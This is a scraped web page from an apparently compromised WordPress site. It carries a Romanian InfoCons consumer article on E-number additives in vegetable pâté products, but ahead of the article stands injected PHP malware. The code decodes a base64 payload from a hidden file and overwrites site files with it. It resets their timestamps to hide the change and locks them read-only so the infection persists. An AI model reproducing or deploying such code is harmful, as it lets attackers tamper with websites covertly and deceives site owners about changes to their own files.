$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } InfoCons: 96% din produsele de tip pate vegetal contin minim 2 E-uri! – O noua atitudine

          Pate-ul este un preparat culinar de consistenta cremoasa obtinut industrial, din diverse ingrediente. Pe piata exista variante de pate de post, pate-uri vegetale care, din pacate reproduc compozitia celor din ficat-carne, continand: apa, ulei vegetal hidrogenat (margarina) sau nehidrogenat, proteina din soia, sare iodata, extract de condimente, mustar, arome, stabilizatori (polifosfaţi E-452), emulgatori (săruri ale acizilor graşi E-470, s.a.), agenti de ingrosare (guma guar E-412, caragenan E-407), amidon din grau si porumb, sirop de glucoza, zaharuri, potentiator de aroma (glutamat monosodic E-621), legume deshidratate, antioxidant (acid ascorbic E-300), acidifiant (acid citric E-330), coloranti (caramel E-150, roşu carmin E-120), extract de paprika.  Mai mult, trebuie sa stii ca acest tip de produs contine alergeni de tipul: gluten, telină, mustar si soia.
InfoCons a realizat acest Studiu Comparativ pe etichete pentru a informa consumatorul asupra produselor pe care acesta le consuma, mai ales in perioada de post.
          Astfel din cele 32 de produse de tip pate vegetal, 96 % au minim 2 E-uri in componenta. Mai mult, 4 % din produse contin maximul de 12 E-uri! De asemenea, exista si 2 produse care nu contin niciun E!
         Acest studiu a fost realizat in parteneriat cu Facultatea de Alimentatie si Turism, Catedra de Inginerie si Management in Turism din cadrul Universitatii Transilvania Brasov, in perioada 16.11.2011 – 09.12.2011.
         Pentru mai multe informatii despre acest Studiu Comparativ pe etichete privind numarul de E-uri continute de produsele de tip pate vegetal, viziteaza pagina www.teste-comparative.ro!
 

By o9admin